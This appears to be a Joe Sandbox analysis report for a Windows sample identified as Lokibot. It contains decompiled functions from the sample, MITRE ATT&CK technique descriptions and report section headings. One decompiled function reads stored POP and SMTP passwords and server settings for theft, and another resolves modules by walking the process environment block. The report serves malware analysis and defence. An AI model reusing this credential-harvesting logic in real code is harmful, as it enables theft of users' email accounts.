			E0040D069(void* __ebx, void* __eflags, intOrPtr* _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __edi;
				void* __esi;
				intOrPtr _t40;
				intOrPtr _t45;
				intOrPtr _t47;
				void* _t71;
				void* _t75;
				void* _t77;

				_t72 = _a4;
				_t71 = E00404BEE(__ebx,  *_a4, L"EmailAddress");
				_t81 = _t71;
				if(_t71 != 0) {
					_push(__ebx);
					_t67 = E00404BEE(__ebx,  *_t72, L"Technology");
					_v16 = E00404BEE(_t37,  *_t72, L"PopServer");
					_v40 = E00404BA7(_t81,  *_t72, L"PopPort");
					_t40 = E00404BEE(_t37,  *_t72, L"PopAccount");
					_v8 = _v8 & 0x00000000;
					_v20 = _t40;
					_v24 = E00404C4E(_t71,  *_t72, L"PopPassword",  &_v8);
					_v28 = E00404BEE(_t67,  *_t72, L"SmtpServer");
					_v44 = E00404BA7(_t81,  *_t72, L"SmtpPort");
					_t45 = E00404BEE(_t67,  *_t72, L"SmtpAccount");
					_v12 = _v12 & 0x00000000;
					_v32 = _t45;
					_t47 = E00404C4E(_t71,  *_t72, L"SmtpPassword",  &_v12);
					_t77 = _t75 + 0x50;
					_v36 = _t47;
					if(_v8 != 0 || _v12 != 0) {
						E00405872( *0x49f934, _t71, 1, 0);
						E00405872( *0x49f934, _t67, 1, 0);
						_t74 = _v16;
						E00405872( *0x49f934, _v16, 1, 0);
						E00405781( *0x49f934, _v40);
						E00405872( *0x49f934, _v20, 1, 0);
						_push(_v8);
						E00405762(_v16,  *0x49f934, _v24);
						E00405872( *0x49f934, _v28, 1, 0);
						E00405781( *0x49f934, _v44);
						E00405872( *0x49f934, _v32, 1, 0);
						_push(_v12);
						E00405762(_t74,  *0x49f934, _v36);
						_t77 = _t77 + 0x88;
					} else {
						_t74 = _v16;
					}
					E0040471C(_t71);
					E0040471C(_t67);
					E0040471C(_t74);
					E0040471C(_v20);
					E0040471C(_v24);
					E0040471C(_v28);
					E0040471C(_v32);
					E0040471C(_v36);
				}
				return 1;
			}

0x0040d070
0x0040d080
0x0040d084
0x0040d086
0x0040d08c
0x0040d0a0
0x0040d0ae
0x0040d0bd
0x0040d0c0
0x0040d0c5
0x0040d0c9
0x0040d0e3
0x0040d0f2
0x0040d101
0x0040d104
0x0040d109
0x0040d110
0x0040d11e
0x0040d123
0x0040d126
0x0040d12d
0x0040d145
0x0040d154
0x0040d15a
0x0040d166
0x0040d174
0x0040d186
0x0040d18e
0x0040d19a
0x0040d1ac
0x0040d1ba
0x0040d1cc
0x0040d1d1
0x0040d1dd
0x0040d1e2
0x0040d1e7
0x0040d1e7
0x0040d1e7
0x0040d1eb
0x0040d1f1
0x0040d1f7
0x0040d1ff
0x0040d207
0x0040d20f
0x0040d217
0x0040d21f
0x0040d227
0x0040d230

Strings

SmtpPort, xrefs: 0040D0EB
SmtpAccount, xrefs: 0040D0FA
Technology, xrefs: 0040D08D
PopAccount, xrefs: 0040D0B6
PopPassword, xrefs: 0040D0D0
SmtpServer, xrefs: 0040D0DC
PopServer, xrefs: 0040D099
EmailAddress, xrefs: 0040D074
SmtpPassword, xrefs: 0040D117
PopPort, xrefs: 0040D0A7

Memory Dump Source

Source File: 00000000.00000002.368660717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.368657499.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.368670807.0000000000415000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.368675103.00000000004A0000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wi7zJOZT2r.jbxd

Yara matches

Similarity

API ID:
String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
API String ID: 0-2111798378
Opcode ID: b68ba21e4a3a0049e44e4174c680ab59653fe0191a5276204f50c9857b9783d9
Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
Opcode Fuzzy Hash: b68ba21e4a3a0049e44e4174c680ab59653fe0191a5276204f50c9857b9783d9
Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48

Uniqueness

Uniqueness Score: -1.00%

Function 0040549C Relevance: .1, Instructions: 146
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0040549C(signed int _a4, signed int* _a8) {
				signed int* _t46;
				void* _t47;
				signed int* _t48;
				signed int* _t49;
				signed int* _t50;
				signed int* _t51;
				signed int* _t52;
				signed int* _t53;
				signed int* _t55;
				signed int* _t57;
				signed int _t59;
				signed int _t61;
				signed int _t62;
				unsigned int _t64;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				signed int _t95;
				signed int _t97;
				signed int _t98;
				signed int _t100;
				signed int _t102;
				signed char* _t124;

				_t124 = _a4;
				_t59 =  *_t124 & 0x000000ff;
				if(_t59 >= 0) {
					_t57 = _a8;
					_t57[1] = _t57[1] & 0x00000000;
					 *_t57 = _t59;
					return 1;
				}
				_t95 = _t124[1] & 0x000000ff;
				if(_t95 >= 0) {
					_t55 = _a8;
					_t55[1] = _t55[1] & 0x00000000;
					 *_t55 = (_t59 & 0x0000007f) << 0x00000007 | _t95;
					return 2;
				}
				_t61 = _t59 << 0x0000000e | _t124[2] & 0x000000ff;
				if(_t61 < 0) {
					_t97 = _t95 << 0x0000000e | _t124[3] & 0x000000ff;
					_t62 = _t61 & 0x001fc07f;
					if(_t97 < 0) {
						_t98 = _t97 & 0x001fc07f;
						_t77 = _t62 << 0x0000000e | _t124[4] & 0x000000ff;
						if(_t77 < 0) {
							_t64 = _t62 << 0x00000007 | _t98;
							_t100 = _t98 << 0x0000000e | _t124[5] & 0x000000ff;
							if(_t100 < 0) {
								_t79 = _t77 << 0x0000000e | _t124[6] & 0x000000ff;
								if(_t79 < 0) {
									_t102 = _t100 << 0x0000000e | _t124[7] & 0x000000ff;
									_t81 = (_t79 & 0x001fc07f) << 7;
									if(_t102 < 0) {
										_t46 = _a8;
										 *_t46 = (_t102 & 0x001fc07f | _t81) << 0x00000008 | _t124[8] & 0x000000ff;
										_t46[1] = (_t124[4] & 0x000000ff) >> 0x00000003 & 0x0000000f | _t64 << 0x00000004;
										_t47 = 9;
									} else {
										_t48 = _a8;
										 *_t48 = _t102 & 0xf01fc07f | _t81;
										_t48[1] = _t64 >> 4;
										_t47 = 8;
									}
								} else {
									_t49 = _a8;
									 *_t49 = (_t100 << 0x00000007 ^ _t79) & 0x0fe03f80 ^ _t79;
									_t49[1] = _t64 >> 0xb;
									_t47 = 7;
								}
							} else {
								_t50 = _a8;
								_a4 = (_t77 & 0x001fc07f) << 0x00000007 | _t100;
								 *_t50 = _a4;
								_t50[1] = _t64 >> 0x12;
								_t47 = 6;
							}
						} else {
							_t51 = _a8;
							 *_t51 = _t98 << 0x00000007 | _t77;
							_t51[1] = _t62 >> 0x12;
							_t47 = 5;
						}
					} else {
						_t52 = _a8;
						_t52[1] = _t52[1] & 0x00000000;
						 *_t52 = _t97 & 0x001fc07f | _t62 << 0x00000007;
						_t47 = 4;
					}
					return _t47;
				} else {
					_t53 = _a8;
					_t53[1] = _t53[1] & 0x00000000;
					 *_t53 = (_t95 & 0x0000007f) << 0x00000007 | _t61 & 0x001fc07f;
					return 3;
				}
			}

0x004054a1
0x004054a4
0x004054a9
0x004054ab
0x004054ae
0x004054b2
0x00000000
0x004054b4
0x004054bb
0x004054c1
0x004054c3
0x004054ce
0x004054d2
0x00000000
0x004054d4
0x004054e2
0x004054e6
0x00405513
0x00405515
0x00405519
0x0040553b
0x0040553d
0x00405541
0x00405565
0x0040556a
0x0040556e
0x0040559a
0x0040559e
0x004055c9
0x004055cb
0x004055d0
0x0040560d
0x00405610
0x00405612
0x00405615
0x004055d2
0x004055d2
0x004055e4
0x004055e6
0x004055e9
0x004055e9
0x004055a0
0x004055a0
0x004055b7
0x004055b9
0x004055bc
0x004055bc
0x00405570
0x00405570
0x0040557d
0x00405587
0x00405589
0x0040558c
0x0040558c
0x00405543
0x00405543
0x00405552
0x00405554
0x00405557
0x00405557
0x0040551b
0x0040551b
0x00405525
0x00405529
0x0040552b
0x0040552b
0x00000000
0x004054e8
0x004054e8
0x004054f9
0x004054fd
0x00000000
0x004054ff

Memory Dump Source

Source File: 00000000.00000002.368660717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.368657499.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.368670807.0000000000415000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.368675103.00000000004A0000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wi7zJOZT2r.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db4539c410e0fe4373e7c5db18565f275e95a05af4a94000d4ba81a11fef15ca
Instruction ID: 891bc98f6eee734ec0083ebf38281cede3cc23ab6c94fa2f23d2f5c2768c820d
Opcode Fuzzy Hash: db4539c410e0fe4373e7c5db18565f275e95a05af4a94000d4ba81a11fef15ca
Instruction Fuzzy Hash: D141F1B0614B205EE30C8F19C895676BFE2EF82341748C07EE8AE8F695C635D506EF58

Uniqueness

Uniqueness Score: -1.00%

Function 004029D4 Relevance: .1, Instructions: 77
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E004029D4(signed int _a28, signed int _a36, unsigned int _a40) {
				signed int _t26;
				signed int _t27;
				signed int _t28;
				signed int _t39;
				signed int _t47;
				unsigned int _t69;
				unsigned int _t70;
				signed int _t71;
				signed int _t73;
				signed int _t75;
				signed int* _t76;

				asm("pushad");
				_t75 = _a36;
				_t69 = _a40;
				_t26 = 0;
				if(_t75 != 0) {
					_t27 = 0xffffffffffffffff;
					if(_t69 != 0) {
						while((_t75 & 0x00000003) != 0) {
							_t47 = _t27 ^  *_t75;
							_t75 = _t75 + 1;
							_t27 = _t47 >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & _t47) * 4);
							_t69 = _t69 - 1;
							if(_t69 != 0) {
								continue;
							}
							break;
						}
						_t73 = _t69 & 0x00000007;
						_t70 = _t69 >> 3;
						while(_t70 != 0) {
							_t76 = _t75 + 4;
							_t39 = ((((_t27 ^  *_t75) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (_t27 ^  *_t75)) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & ((_t27 ^  *_t75) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (_t27 ^  *_t75)) * 4))) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (((_t27 ^  *_t75) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (_t27 ^  *_t75)) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & ((_t27 ^  *_t75) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (_t27 ^  *_t75)) * 4))) * 4))) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & ((((_t27 ^  *_t75) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (_t27 ^  *_t75)) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & ((_t27 ^  *_t75) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (_t27 ^  *_t75)) * 4))) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (((_t27 ^  *_t75) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (_t27 ^  *_t75)) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & ((_t27 ^  *_t75) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (_t27 ^  *_t75)) * 4))) * 4))) * 4))) * 4) ^  *_t76;
							_t75 =  &(_t76[1]);
							_t27 = (((_t39 >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & _t39) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (_t39 >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & _t39) * 4))) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & ((_t39 >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & _t39) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (_t39 >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & _t39) * 4))) * 4))) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (((_t39 >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & _t39) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (_t39 >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & _t39) * 4))) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & ((_t39 >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & _t39) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (_t39 >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & _t39) * 4))) * 4))) * 4))) * 4);
							_t70 = _t70 - 1;
						}
						_t71 = _t73;
						if(_t71 != 0) {
							do {
								_t28 = _t27 ^  *_t75;
								_t75 = _t75 + 1;
								_t27 = _t28 >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & _t28) * 4);
								_t71 = _t71 - 1;
							} while (_t71 != 0);
						}
					}
					_t26 =  !_t27;
				}
				_a28 = _t26;
				asm("popad");
				return _t26;
			}

0x004029d4
0x004029d5
0x004029d9
0x004029e2
0x004029e6
0x004029ec
0x004029f1
0x004029f7
0x004029ff
0x00402a01
0x00402a0c
0x00402a0f
0x00402a10
0x00000000
0x00000000
0x00000000
0x00402a10
0x00402a14
0x00402a17
0x00402a1a
0x00402a1e
0x00402a55
0x00402a57
0x00402a8b
0x00402a8e
0x00402a8e
0x00402a91
0x00402a95
0x00402a97
0x00402a97
0x00402a99
0x00402aa4
0x00402aa7
0x00402aa7
0x00402a97
0x00402a95
0x00402aaa
0x00402aaa
0x00402aac
0x00402ab0
0x00402ab1

Memory Dump Source

Source File: 00000000.00000002.368660717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.368657499.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.368670807.0000000000415000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.368675103.00000000004A0000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wi7zJOZT2r.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f39fa327c75608c0a161e98e355e11108031192147f1793d7a103cb0e814a40
Instruction ID: 8dc71014d8856f8ef2ad0e1c9cf09a1ab0c18a5277cabcb9e4e86e23f7506178
Opcode Fuzzy Hash: 5f39fa327c75608c0a161e98e355e11108031192147f1793d7a103cb0e814a40
Instruction Fuzzy Hash: 4B21BE76AB0A9317DB618D38C8C83B263D0EF99700F980634CF40D37C6D678EA21DA84

Uniqueness

Uniqueness Score: -1.00%

Function 0040317B Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E0040317B(intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				void* __ecx;
				intOrPtr _t17;
				void* _t21;
				intOrPtr* _t23;
				void* _t26;
				void* _t28;
				intOrPtr* _t31;
				void* _t33;
				signed int _t34;

				_push(_t25);
				_t1 =  &_v8;
				 *_t1 = _v8 & 0x00000000;
				_t34 =  *_t1;
				_v8 =  *[fs:0x30];
				_t23 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0xc)) + 0xc));
				_t31 = _t23;
				do {
					_v12 =  *((intOrPtr*)(_t31 + 0x18));
					_t28 = E00402C77(_t34,  *((intOrPtr*)(_t31 + 0x28)));
					_pop(_t26);
					_t35 = _t28;
					if(_t28 == 0) {
						goto L3;
					} else {
						E004032EA(_t35, _t28, 0);
						_t21 = E00402C38(_t26, _t28, E00405D24(_t28) + _t19);
						_t33 = _t33 + 0x14;
						if(_a4 == _t21) {
							_t17 = _v12;
						} else {
							goto L3;
						}
					}
					L5:
					return _t17;
					L3:
					_t31 =  *_t31;
				} while (_t23 != _t31);
				_t17 = 0;
				goto L5;
			}

0x0040317f
0x00403180
0x00403180
0x00403180
0x0040318d
0x00403196
0x00403199
0x0040319b
0x004031a1
0x004031a9
0x004031ab
0x004031ac
0x004031ae
0x00000000
0x004031b0
0x004031b3
0x004031c2
0x004031c7
0x004031cd
0x004031e0
0x00000000
0x00000000
0x00000000
0x004031cd
0x004031d7
0x004031dd
0x004031cf
0x004031cf
0x004031d1
0x004031d5
0x00000000

Memory Dump Source

Source File: 00000000.00000002.368660717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.368657499.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.368670807.0000000000415000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.368675103.00000000004A0000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wi7zJOZT2r.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report wi7zJOZT2r.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Lokibot

Yara Signatures

Initial Sample

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Roaming\C79A3B\B52B3F.lck

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\414045e2d09286d5db2581e0d955d358_d06ed635-68f6-4e9a-955c-4899f5f57b9a

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Imports

Network Behavior

Snort IDS Alerts

Network Port Distribution

Windows Analysis Report
wi7zJOZT2r.exe

Function 00403D74 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 200
fileCOMMON

Function 0040650A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67
COMMON

Function 00402B7C Relevance: 3.0, APIs: 2, Instructions: 20
memoryCOMMON

Function 00406069 Relevance: 1.5, APIs: 1, Instructions: 12
COMMON

Function 004061C3 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 151
COMMON

Function 00404E17 Relevance: 7.6, APIs: 5, Instructions: 72
networkCOMMON

Function 004040BB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129
filememoryCOMMON

Function 00413866 Relevance: 4.6, APIs: 3, Instructions: 147
synchronizationCOMMON

Function 004042CF Relevance: 4.6, APIs: 3, Instructions: 60
fileCOMMON

Function 00412D31 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 178
threadCOMMON

Function 0040632F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35
COMMON

Function 00406086 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15
COMMON

Function 00402C03 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 13
libraryloaderCOMMON

Function 00404A52 Relevance: 3.1, APIs: 2, Instructions: 63
registryCOMMON

Function 004060BD Relevance: 1.6, APIs: 1, Instructions: 53
COMMON

Function 00403C62 Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Function 0040642C Relevance: 1.5, APIs: 1, Instructions: 18
COMMON

Function 00404EEA Relevance: 1.5, APIs: 1, Instructions: 16
networkCOMMON

Function 00403BD0 Relevance: 1.5, APIs: 1, Instructions: 14
COMMON

Function 0040427D Relevance: 1.5, APIs: 1, Instructions: 13
COMMON

Function 00404A19 Relevance: 1.5, APIs: 1, Instructions: 13
registryCOMMON

Function 00403C40 Relevance: 1.5, APIs: 1, Instructions: 12
COMMON

